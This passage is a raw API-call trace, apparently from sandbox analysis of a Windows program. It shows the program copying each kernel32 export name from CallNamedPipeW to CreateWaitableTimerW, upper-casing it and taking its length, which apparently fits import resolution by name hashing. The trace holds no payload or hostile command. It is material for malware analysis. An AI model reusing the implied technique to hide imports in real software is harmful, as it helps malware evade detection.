[0181.033] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0181.033] lstrcpyA (in: lpString1=0x36fce30, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0181.033] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0181.033] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0181.033] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0181.033] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0181.033] lstrlenA (lpString="CANCELIO") returned 8 [0181.033] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0181.033] lstrlenA (lpString="CANCELIOEX") returned 10 [0181.033] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0181.033] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0181.033] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0181.033] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0181.033] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0181.033] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0181.033] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0181.033] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0181.033] lstrcpyA (in: lpString1=0x36fce30, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0181.033] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0181.033] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0181.033] lstrlenA (lpString="CHECKELEVATION") returned 14 [0181.033] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0181.033] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0181.033] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0181.034] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0181.034] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0181.034] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0181.034] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0181.034] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0181.034] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0181.034] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0181.034] lstrcpyA (in: lpString1=0x36fce30, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0181.034] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0181.034] lstrcpyA (in: lpString1=0x36fce30, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0181.034] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0181.034] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0181.034] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0181.034] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0181.034] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0181.034] lstrcpyA (in: lpString1=0x36fce30, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0181.034] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0181.034] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0181.034] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0181.034] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0181.034] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0181.034] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0181.034] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0181.034] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0181.034] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0181.034] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0181.034] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0181.034] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0181.034] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0181.034] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0181.034] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0181.034] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0181.034] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0181.034] lstrcpyA (in: lpString1=0x36fce30, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0181.034] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0181.034] lstrcpyA (in: lpString1=0x36fce30, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0181.034] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0181.034] lstrcpyA (in: lpString1=0x36fce30, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0181.035] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0181.035] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0181.035] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0181.035] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0181.035] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0181.035] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0181.035] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0181.035] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0181.035] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0181.035] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0181.035] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0181.035] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0181.035] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0181.035] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0181.035] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0181.035] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0181.035] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0181.035] lstrcpyA (in: lpString1=0x36fce30, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0181.035] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0181.035] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0181.035] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0181.035] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0181.035] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0181.035] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0181.035] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0181.035] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0181.035] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0181.035] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0181.035] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0181.035] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0181.035] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0181.035] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0181.035] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0181.035] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0181.035] lstrlenA (lpString="COPYCONTEXT") returned 11 [0181.035] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0181.035] lstrlenA (lpString="COPYFILEA") returned 9 [0181.035] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0181.036] lstrlenA (lpString="COPYFILEEXA") returned 11 [0181.036] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0181.036] lstrlenA (lpString="COPYFILEEXW") returned 11 [0181.036] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0181.036] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0181.036] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0181.036] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0181.036] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0181.036] lstrlenA (lpString="COPYFILEW") returned 9 [0181.036] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0181.036] lstrlenA (lpString="COPYLZFILE") returned 10 [0181.036] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0181.036] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0181.036] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0181.036] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0181.036] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0181.036] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0181.036] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0181.036] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0181.036] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0181.036] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0181.036] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0181.036] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0181.036] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0181.036] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0181.036] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0181.036] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0181.036] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0181.036] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0181.036] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0181.036] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0181.036] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0181.036] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0181.036] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0181.036] lstrlenA (lpString="CREATEEVENTA") returned 12 [0181.036] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0181.036] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0181.037] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0181.037] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0181.037] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0181.037] lstrlenA (lpString="CREATEEVENTW") returned 12 [0181.037] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0181.037] lstrlenA (lpString="CREATEFIBER") returned 11 [0181.037] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0181.037] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0181.037] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0181.037] lstrlenA (lpString="CREATEFILEA") returned 11 [0181.037] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0181.037] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0181.037] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0181.037] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0181.037] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0181.037] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0181.037] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0181.037] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0181.037] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0181.037] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0181.037] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0181.037] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0181.037] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0181.037] lstrlenA (lpString="CREATEFILEW") returned 11 [0181.037] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0181.037] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0181.037] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0181.037] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0181.037] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0181.037] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0181.037] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0181.037] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0181.037] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0181.037] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0181.037] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0181.037] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0181.037] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0181.037] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0181.038] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0181.038] lstrlenA (lpString="CREATEJOBSET") returned 12 [0181.038] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0181.038] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0181.038] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0181.038] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0181.038] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0181.038] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0181.038] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0181.038] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0181.038] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0181.038] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0181.038] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0181.038] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0181.038] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0181.038] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0181.038] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0181.038] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0181.038] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0181.038] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0181.038] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0181.038] lstrlenA (lpString="CREATEPIPE") returned 10 [0181.038] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0181.038] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0181.038] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0181.038] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0181.038] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0181.038] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0181.038] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0181.038] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0181.038] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0181.038] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0181.038] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0181.038] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0181.038] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0181.038] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0181.038] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0181.038] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0181.038] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0181.039] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0181.039] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0181.039] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0181.039] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0181.039] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0181.039] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0181.039] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0181.039] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0181.039] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0181.039] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0181.039] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0181.039] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0181.039] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0181.039] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0181.039] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0181.039] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0181.039] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0181.039] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0181.039] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0181.039] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0181.039] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0181.039] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0181.039] lstrlenA (lpString="CREATETHREAD") returned 12 [0181.039] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0181.039] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0181.039] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0181.039] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0181.039] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0181.039] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0181.039] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0181.039] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0181.039] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0181.039] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0181.039] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0181.039] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0181.039] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0181.039] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0181.039] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0181.040] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0181.040] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0181.040] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0181.040] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0181.040] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0181.040] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0181.040] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0181.040] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0181.040] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0181.040] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateWaitableTimerW" | out: 